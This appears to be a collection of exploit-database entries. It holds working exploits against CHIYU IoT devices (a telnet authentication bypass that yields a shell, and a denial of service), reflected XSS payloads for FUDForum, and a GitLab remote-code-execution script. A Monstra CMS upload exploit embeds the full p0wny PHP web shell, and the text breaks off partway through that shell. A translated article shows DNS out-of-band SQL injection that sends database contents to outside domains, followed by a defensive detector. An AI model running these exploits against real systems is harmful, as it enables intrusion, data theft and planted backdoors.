# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.

CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3
# usage: python3 exploit.py IP
import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        # Telnet option negotiation: IAC WILL ECHO, IAC WILL SUPPRESS-GO-AHEAD, IAC DO TERMINAL-TYPE
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        # The device answers IAC DONT ECHO (ff fe 01) once it considers the session authenticated
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()
        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                    cmd = input("(CHIYU pwnShell:) $ ")
                    body = cmd + "\n"
                    s.send(body.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode('utf8', 'ignore')
                    if not len(result):
                        print("[+] CHIYU device not available, try again ... (terminating)")
                        s.close()
                        break
                    print(result.strip('CMD>'))
                    b = "\n"
                    s.send(b.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode()
                    print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()
except socket.error:
    print("[+] Unable to connect to CHIYU device.")
-
FUDForum 3.1.0 - 'srch' Reflected XSS
# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
# Version: FUDForum 3.1.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27519

-Description:
A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter.

-Payload used:
x" onmouseover=alert(1) x="

-Steps to reproduce:
1- Go to https://localhost/fudforum/index.php?t=search&
2- In the "forum search" option, paste the XSS payload
3- Hover your mouse over "x" and the XSS will get triggered
-
Using sqlmap to perform OOB (out-of-band) injection over DNS (repost)

0x00 Background

In a real engagement I ran into an injection. sqlmap could be used, but because the injection was time-based and subject to rate limits, the --delay parameter was required. It was delay, --delay and other tedium. Everything introduced below uses sqlmap with DNS to perform OOB (out-of-band) injection and get data out quickly. In general it only applies to the Windows platform.

0x01 Scenarios

Have you encountered injection scenarios like these?
1. Time-based blind injection, where the contents of the database, tables and fields are very large and waiting is exhausting.
2. MySQL 5.6+, where only mysqli or PDO connections can be used (a PDO connection is recommended). Multiple statements can be executed through a PDO connection, but since PDO only returns the result of the first SQL statement, obtaining data directly is generally impossible and you are forced into visible-field or sleep-based injection.
3. The test is not intercepted or filtered and you feel that execution succeeded, but no returned data is received (when commands can be executed, a file can also be written into the web directory).

0x02 Principle

A UNC path is used to query a specified domain name. Over the DNS channel, the data received by the DNS server is used to obtain the data contents quickly. Using DNS has the particular advantage of breaking through host network isolation: for example, a DMZ host often cannot connect directly to the external network, but it frequently uses a DNS server that is reachable within the configured network. By querying the domain name recursively, the DNS server can carry the data out through the DNS protocol. UNC paths are a Windows feature; no such function exists on a default Linux installation.

The flow chart is as follows:

MySQL, linking the database through PDO, with blind injection used to judge success (normal injection also applies):

select load_file(concat('//', (select 2333), '.mysql.panokaz.exeye.io/abc'));
select hex('select load_file(concat(\'//\', (select 2333), \'.mysql.panokaz.exeye.io/abc\'));')
set @x=0x53454C454354204C4F41445F46494C4528434F4E43415428272F272C28553454C4543542027 7465737427292C272E6D7973716C2E70616E6F6B617A2E65786579652E696F2F6162632729293B; prepare a from @x; execute a;

MySQL usage scenario: the upstream DNS servers caught performing the domestic recursive DNS queries were 360, Tencent and Ali. With a node DNS server like that you would undoubtedly get hold of a great many sites. I got a little excited just thinking about it.

SQL Server can use the following method:

@s varchar(5000), @host varchar(5000) set @s=(host_name()) set @host=convert(varchar(5000), @s)+'sqlserver.panokaz.exeye.io'; exec('master.xp_dirtree ''\\'+@host+'\foobar$''')

SQL Server usage scenario:

0x03 Problems encountered in manual testing, and solutions

Because of the DNS cache, once a domain name has been requested a DNS record is generated on the local machine and the name is not queried recursively outward again. Therefore the DNS domain names in the UNC paths must not be the same.

The length of a UNC path cannot be too long. With an identifier starting with '\\' followed by a long run of 'a' characters, the maximum length is 128; from this you can see that the maximum length of a UNC path is 128.

A UNC path cannot contain special characters such as spaces; if it does, the DNS request is not sent.

Taking SQL Server injection as an example, refer to the solution that sqlmap produces:

'; declare @host varchar(1024); set @host='rmy.'+(select top 1 substring(master.dbo.fn_varbintohexstr(cast(isnull(cast(name as nvarchar(4000)), '') as ...)),1,13) from master..sysdatabases where name not in (select ...) order by name)+'.nrz.rainism.cc'; exec('master.xp_dirtree ''\\'+@host+'\cckc''')--

Random strings "rmy" and "nrz" are added to the domain name to make sure DNS has no cached entry for each query.
The substring() function is used to transfer a fixed number of characters of data each time.
The obtained data is hex-encoded with the master.dbo.fn_varbintohexstr() stored procedure.

0x04 Using sqlmap's --dns-domain parameter for OOB injection

How could such a convenient and fast injection method do without an automated tool? Students who have read the sqlmap documentation carefully will know the --dns-domain parameter, which is how sqlmap integrates DNS for OOB injection.

Usage: when sqlmap runs with the --dns-domain parameter it listens on port 53. A DNS server is needed so that the data carried over DNS reaches the host running sqlmap. Because a DNS server is also required, two domain names are needed; the detailed configuration is as follows:

1. Configure the domain names ns1.xxx.com and ns2.xxx.com to resolve to the IP of the host running sqlmap; here A records are configured using the * wildcard.
2. Configure ns1.xxx.com and ns2.xxx.com as the name servers for rainism.cc, the domain name used to take the data out.
3. Run the following command on a VPS on the external network: sqlmap.py -u 'http://xoo.com/index.php?id=1*' --random-agent --dns-domain='rainism.cc' -v 3

Listening on port 53 with tcpdump, the returned data can be seen.

Original link: https://MP.Weixin.QQ.com/s/NCVRK6NEB_LDV7MXDXN3VA
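An added defender-side example, not part of the original article: a small detector run over constructed DNS query-log lines shaped like the names the article builds (random cache-busting labels plus fn_varbintohexstr()/hex() output under an attacker-controlled zone). The log format, thresholds and sample names are assumptions; the zones are the ones the article uses.

```python
import re
from collections import defaultdict

# Constructed detection example for the DNS out-of-band technique above.
# Log format ("<time> <client> <qname>"), thresholds and sample names are assumed.
HEX_LABEL = re.compile(r"^(0x)?[0-9a-fA-F]{8,}$")   # fn_varbintohexstr() / hex() output

SAMPLE_LOG = """\
12:00:01 10.0.0.5 www.example.com
12:00:02 10.0.0.5 mail.example.com
12:00:03 10.0.0.9 2333.mysql.panokaz.exeye.io
12:00:04 10.0.0.9 rmy.0x6d6173746572.nrz.rainism.cc
12:00:05 10.0.0.9 kqd.0x74656d706462.pln.rainism.cc
12:00:06 10.0.0.9 zab.0x6d6f64656c.qwe.rainism.cc
12:00:07 10.0.0.5 cdn.example.com
"""


def decode_hex_label(label: str) -> str:
    """Decode a hex label back to text for triage; '' if it is not valid hex."""
    raw = label[2:] if label.lower().startswith("0x") else label
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return ""


def base_domain(qname: str) -> str:
    # Last two labels; a production system would consult the public suffix list.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_oob(log_text: str, min_unique: int = 3, min_labels: int = 4) -> dict:
    """Flag zones that look like an exfiltration channel.

    A zone is flagged when any subdomain label is a long hex string, or when
    a client sends at least min_unique distinct deep names (min_labels labels
    or more) without ever repeating one, which is the cache-busting pattern
    the article describes (random prefix per query).
    Returns {zone: {"clients": [...], "unique_names": n, "decoded": [...]}}.
    """
    per_zone = defaultdict(lambda: {"clients": set(), "queries": 0,
                                    "names": set(), "decoded": []})
    for line in log_text.splitlines():
        try:
            _, client, qname = line.split()
        except ValueError:
            continue                      # malformed line; skip it
        zone = base_domain(qname)
        entry = per_zone[zone]
        entry["clients"].add(client)
        entry["queries"] += 1
        entry["names"].add(qname)
        for label in qname.split(".")[:-2]:
            if HEX_LABEL.match(label):
                entry["decoded"].append(decode_hex_label(label))

    flagged = {}
    for zone, e in per_zone.items():
        deep = [n for n in e["names"] if n.count(".") + 1 >= min_labels]
        cache_busting = len(deep) >= min_unique and len(e["names"]) == e["queries"]
        if e["decoded"] or cache_busting:
            flagged[zone] = {"clients": sorted(e["clients"]),
                             "unique_names": len(e["names"]),
                             "decoded": e["decoded"]}
    return flagged


if __name__ == "__main__":
    for zone, info in detect_dns_oob(SAMPLE_LOG).items():
        print(zone, info)
```

On a real resolver log the hex rule alone would still catch the fn_varbintohexstr() form, while the cache-busting rule needs the per-client baseline tuned to avoid CDNs that legitimately use deep, unique names.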
-
CHIYU IoT Devices - Denial of Service (DoS)
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description:
A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be exploited by sending an unexpected integer (> 32 bits) on the page parameter, which crashes the web portal and makes it unavailable until a reboot of the device.

CVE ID: CVE-2021-31642
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642

Affected parameter: page=
Component: if.cgi
Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

====HTTP request======
GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to the CGI component (if.cgi)
3. Append the payload at the end of the vulnerable parameter (page)
4. Submit the request and observe payload execution

Mitigation:
The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
-
Gitlab 13.9.3 - Remote Code Execution (Authenticated)
# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated)
# Date: 02/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.9.4
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.9.1 CE
# Credits: https://hackerone.com/reports/1125425

#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse

parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()

username = args.u
password = args.p
gitlab_url = args.t
command = args.c

session = requests.Session()

# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")

# Creating Project
print("[2] Creating Project")
r = session.get(f"{gitlab_url}/projects/new")
soup = BeautifulSoup(r.text, features="lxml")
project_token = soup.findAll('meta')[16].get("content")
project_token = project_token.replace("==", "%3D%3D")
project_token = project_token.replace("+", "%2B")
project_name = f'project{random.randrange(1, 10000)}'
cookies = {
    'sidebar_collapsed': 'false',
    'event_filter': 'all',
    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
    '_gitlab_session': session.cookies['_gitlab_session'],
}
payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20"
r = session.post(gitlab_url + '/projects', data=payload, cookies=cookies, verify=False)
if "The change you requested was rejected." in r.text:
    exit('Exploit failed, check input params')
else:
    print("Successfully created project")

# Cloning Wiki and Writing Files
print("[3] Pushing files to the project wiki")
wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git'
os.system(f"git clone {wiki_url} /tmp/project")
# The "\}" inside the kramdown options block is literal (backslash, brace).
f1 = open("/tmp/project/load1.rmd", "w")
f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\\}" /}\n\n')
f1.write('~~~ ruby\n')
f1.write(' def what?\n')
f1.write(' 42\n')
f1.write(' end\n')
f1.write('~~~\n')
f1.close()
f2 = open("/tmp/project/load2.rmd", "w")
temp = '{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`' + command + '`\', formatter: GetProcessMem\\}" /}\n\n'
f2.write(temp)
f2.write('~~~ ruby\n')
f2.write(' def what?\n')
f2.write(' 42\n')
f2.write(' end\n')
f2.write('~~~\n')
f2.close()
# It will prompt for user and pass. Enter it.
os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push')
print("Successfully Pushed")

# Cleaning Up
os.system('rm -rf /tmp/project')

# Triggering RCE
print("[4] Triggering RCE")
trigger_url = f"{gitlab_url}/{username}/{project_name}/-/wikis/load2"
r = session.get(trigger_url, cookies=cookies, verify=False)
-
FUDForum 3.1.0 - 'author' Reflected XSS
# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
# Version: FUDForum 3.1.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27520

-Description:
A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter.

-Payload used:
y" onmouseover=alert(2) y="

-Steps to reproduce:
1- Go to https://localhost/fudforum/index.php?t=search&
2- In the "Filter by User" search option, paste the XSS payload
3- Hover your mouse over "y" and the XSS will get triggered
-
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
# Date: 03.06.2021
# Exploit Author: Ron Jost (hacker5preme)
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: Ubuntu 20.04
# CVE: CVE-2018-6383
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit

'''
Description:
Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048.
'''

'''
Import required modules:
'''
import argparse
import requests

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383')
my_parser.add_argument('-T', type=str, help='Target IP')
my_parser.add_argument('-P', type=str, help='Target Port')
my_parser.add_argument("-U", type=str, help="Monstra CMS Path")
my_parser.add_argument('-u', type=str, help="Username")
my_parser.add_argument('-p', type=str, help='Password')
args = my_parser.parse_args()
target_ip = args.T
target_port = args.P
Monstracms_path = args.U
username = args.u
password = args.p

'''
Exploit:
'''
# Cookies: fetch the login page once to obtain a PHPSESSID from the target
session = requests.Session()
url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php'
cookies = session.get(url).cookies.get_dict()
value = cookies['PHPSESSID']
cookies = {
    "__atuvc": "9%7C22",
    'PHPSESSID': value
}

# Construct authentication header:
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php',
    "Upgrade-Insecure-Requests": "1"
}

# Construct authentication body
body = {
    "login": username,
    "password": password,
    "login_submit": "Log In"
}
x = requests.post(url, headers=headers, cookies=cookies, data=body)

# Construct Exploit link:
url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager'

# Construct Exploit header:
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager',
    "Upgrade-Insecure-Requests": "1"
}

# Construct Exploit data (multipart body captured with Burp; the csrf value is the one from that capture):
burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&amp;\")\n .replace(/</g, \"&lt;\")\n .replace(/>/g, \"&gt;\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n 